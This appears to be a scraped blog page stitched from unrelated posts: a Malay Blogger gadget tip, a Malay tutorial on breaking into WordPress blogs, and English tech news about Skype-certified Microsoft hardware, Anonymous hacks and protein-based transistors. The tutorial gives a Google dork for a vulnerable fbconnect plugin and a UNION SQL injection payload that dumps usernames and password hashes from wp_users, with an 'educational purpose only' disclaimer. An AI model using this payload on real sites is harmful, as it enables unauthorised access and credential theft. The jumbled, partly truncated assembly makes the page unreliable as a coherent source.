Tukarkan link-blog-anda kepada anda punya link blog,contohnya,saya akan menggunakan sebagai Feed URL saya.

Seterusnya,klik pada Continue.Setelah itu,setting gajet itu mengikut kehendak anda dan klik pada Save.

Kini,anda sudah mempunyai gajet recent comments di blog anda !

Tutorial menggodam blog WordPress dengan cara mudah

Pada tutorial kali ini,saya akan mengajar anda cara untuk menggodam blog WordPress dengan menggunakan enjin carian terbesar iaitu Google.

Pastikan anda mempunyai sambungan internet,kemudian buka pelayar internet yang anda kehendaki.Masukkan URL Google iaitu
Pada kotak carian,masukkan kata kunci inurl:"fbconnect_action=myhome"

Tekan "Search".
Google akan mengeluarkan keputusan bagi hasil carian tersebut.
Pilih satu laman yang anda inginkan,buka laman tersebut.Pada tutorial ini,saya akan menggunakan laman ini :

Seterusnya,anda ubah link tersebut.

Gantikan ?fbconnect_action=myhome&userid=6 dengan ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z​0mbyak,7,8,9,10,11,12+from+wp_users--

Maka,link tersebut akan menjadi,2,3,4,5,concat(user_login,0x3a,user_pass)+z0mbyak,7,8,9,10,11,12+from+wp_users--

Di situ akan tertera user login & user pass.Sila decrypt user pass tersebut terlebih dahulu.
Diharap,tutorial kali ini dapat menambahkan ilmu pengetahuan anda dalam bidang IT.
This tutorial is for educational purpose only !

Microsoft HD Webcams and USB Headsets Now Skype Certified

Microsoft’s acquisition of Skype is starting to pay off. The company has just announced that new Microsoft Hardware products will soon start shipping to the market with the “Skype Certified” stamp on their boxes.

The Redmond-based software giant has started to certify all Microsoft HD webcams and USB Microsoft headsets, which means that users who will choose these products are guaranteed to enjoy an optimal Skype experience, including HD quality video calls.

Ed Botterill, head of Skype Certification, commented on the certification and said that it was an important milestone for Skype’s millions of monthly connected users, and that it also marks a step forward when considering the integration process into Microsoft.

“The essence of certification is for Skype to guide its users to the best hardware that will produce the best Skype experiences,” he stated.

“This is the first time we’ve been able to guide them to such a big hardware player in Microsoft, whose webcams and headsets will improve the Skype experience for the majority of our user base.”

He also noted that the newly certified hardware marked only the beginning of a partnership meant to help deliver better hardware experiences to all users.

Kurt Wrisley, senior program manager with Microsoft Hardware, added that Microsoft Hardware was currently working to have products pushed top as many Skype users out there as possible. “Getting their endorsement on your box is huge,” he said.

Each year, Skype users make 300 billion minutes of calls, and the company will gain a lot from informing users that they could benefit from a better experience when using Microsoft’s own hardware.

“We have the opportunity to put together the world’s biggest video calling platform with Skype together with industry leaders in Microsoft who have really come on strong in the headset and webcam market,” Botterill said.

“Now that we’re part of the same company, that’s where we really should be able to define future products and quality levels.”

NY Police Equipment Store Hacked by Anonymous

The official site of the New York Iron Works (, a company that provides equipment and tactical gear to law enforcement agencies, was hacked by Anonymous as part of the FFF (short for [expletive] FBI Friday) operation.

The breach was also performed in support for Jeremy Hammond, one of the hackers ratted out by Hector Xavier Montsegur, known in the online activist communities as Sabu.

“To our fallen brothers Your work has not been forgotten, your skills and teachings has spawn another generation of an elite squander. Like the knights at the round table, we have shared may common interests but let us not forget the game we play. AntiSec is still alive and well,” reads the hackers’ statement.

The New York Iron Works’ main webpage was defaced to display a message, along with tons of information obtained from the organization’s servers. The leaked data includes usernames, clear-text passwords and email addresses.

“As the events are unfolding they are changing the fundamental of history as we know it. But dont be mistaken for, We will fight any individual, organization, corporation, and/or government that hinder our movement,” AntiSec hackers wrote on the defaced page.

“While some of our methods may seem unjust we believe that the action taken is needed. We are fighting the very institutions those are supposed to protect us. Fueled by money and power... the true nature of the government is at best: weak.”

Currently, the site of New York Iron Works is offline. The decision was most likely made because of the large number of login credentials that were made public.

We expect the site to remain down until all the passwords are changed and the vulnerability used by the hackers to gain unauthorized access is patched up.

Human Blood and Milk Used to Make Biodegradable Transistors

Biocomputers are something that the scientific community has been droning on and on about for years, but the newest type of transistors may be taking things a bit further than anyone expected.

There isn't much of a roundabout way to say this, so we'll just throw it out there: some researchers from the Tel Aviv University created transistors out of human breast milk, mucus and blood.

Indeed, our bodily fluids have become the fuel for technological evolution. Now there really is a reason to consider that all those movies about technology “assimilating” human beings were on to something.

Seriously though, the people at the university used human bodily fluids, or the proteins in them to be more precise, to make biodegradable transistors.

Said transistors are silicon-free and even flexible, made by applying the bodily fluids to a base coating and then letting the whole thing dry.

The semiconductor film created through such a procedure has a thickness of a few nanometers and, by blending the three fluids in different proportions, can reach even 18nm.

“Together, the three different kinds of proteins create a complete circuit with electronic and optical capabilities, each bringing something unique to the table. Blood protein has the ability to absorb oxygen [...] which permits the 'doping' of semi-conductors with specific chemicals in order to create specific technological properties,” the researcher say.

“Milk proteins, known for their strength in difficult environments, form the fibers which are the building blocks of the transistors, while the mucosal proteins have the ability to keep red, green and, blue fluorescent dyes separate, together creating the white light emission that is necessary for advanced optics.”

The biodegradability stems from the fact that the proteins are completely organic. In other words, future machines won't be so hard to dispose of and won't damage the environment much at all.

The team made some transistors usable in displays, so far, but they hope to make entire electronic devices eventually.

BPAS Anonymous Hacker Arrested by Scotland Yard

In the morning of March 9, Metropolitan Police officials apprehended a 27-year-old man, allegedly part of the Anonymous community, suspected of being responsible for the data breach that targeted the British Pregnancy Advisory Service (BPAS) a day before.

Graham Cluley brings to our attention that the official site of the BPAS, an organization that offers advice regarding abortion, pregnancy and other similar topics, was defaced for some time yesterday, being altered to display the Anonymous logo and an anti-abortion message.

While an official Met Police press release stated that no medical or personal information was obtained by the hackers, a Twitter account called @PabloEscobarSec revealed that the entire database was obtained.

“British Pregnancy Advisory Service was attacked because they kill unborn children that have no rights. It's murder,” PabloEscobar wrote. “We have their entire database and customers contact details.”

It’s uncertain if the man behind the Twitter account is the person apprehended this morning by authorities, but at press time, the last activity recorded on the social network site was 17 hours ago.

Other tweets posted by the hacker hint that he may be part of the old LulzSec gang which announced its intentions of disbanding in the summer of 2011.

In the meantime, the Police Central e-Crime Unit (PeCU) is working on mitigating the effects of this incident.

“We have taken rapid action to identify and arrest a suspect involved in hacking. This was done to prevent personal details of people who had requested information from the BPAS website being made public,” Detective Inspector Mark Raymond of the PeCU said.

“It should be stressed that the stolen data did not contain the medical details of women who had received treatment or why individuals had contacted the British Pregnancy Advisory Service.”

Operation Bahrain Video Released by Anonymous

Anonymous hacktivists have become highly involved in the past period in the protests that take place worldwide against governing regimes. Their latest video reveals the hackers’ support for the people of Bahrain which have been demanding freedom and democracy.

“For over one year the people of Bahrain have peacefully protested in the streets for freedom, justice, and democracy. They have been met with tear gas, live ammunition, torture, kidnapping and death while the United Nations and countries around the world turn their backs,” Anonymous representatives say.

In February, Softpedia had the opportunity to talk to one of the hackers that’s actively involved in this campaign. At the time, S3rver.exe managed to breach the official sites of Bahrain’s Ministry of Education and the country’s ICT Specific Council.

“To the people of Bahrain, continue protesting. Continue demonstrating peacefully. You have the support of the people of the world and you will have the freedom you deserve,” the hacktivists say in their latest video statement.